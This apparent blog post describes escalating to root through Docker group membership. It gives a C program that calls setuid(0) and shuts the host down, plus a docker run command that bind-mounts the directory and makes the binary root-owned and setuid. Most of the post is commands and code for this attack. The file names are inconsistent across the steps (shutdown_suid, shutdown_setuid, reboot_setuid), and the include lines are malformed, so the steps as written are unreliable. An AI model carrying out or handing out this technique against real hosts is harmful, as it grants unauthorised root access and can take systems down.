Serious docker root exploit

I was amazed at how easy this was.  I found a couple different websites that lead me to this, giving credit where credit is due

1. http://yatb.giacomodrago.com/en/post/10/shutdown-linux-system-from-within-php-script.html

2. http://reventlov.com/advisories/using-the-docker-command-to-root-the-host

So putting 1 and 2 together.  I have my docker install running as the “docker” user, so no “sudo” required.  All I did (as docker) is :

1. Create the following snippet of C code shutdown_suid.c :
docker $> vi shutdown_suid.c
include <stdlib.h>
include <unistd.h>

int main() {
setuid(0);
system(“/sbin/shutdown -h now”); /* change this to the actual location of shutdown */
return 0;
}

2. Compile it :docker $> gcc -o shutdown_setuid shutdown_setuid.c

3. Exploit docker to mount the current directory and set rebuild_setuid to be owned as root and turn on the setuid permissions :
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c ‘chown root.root /stuff/reboot_setuid && chmod a+s /stuff/reboot_setuid’

4. docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid

This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *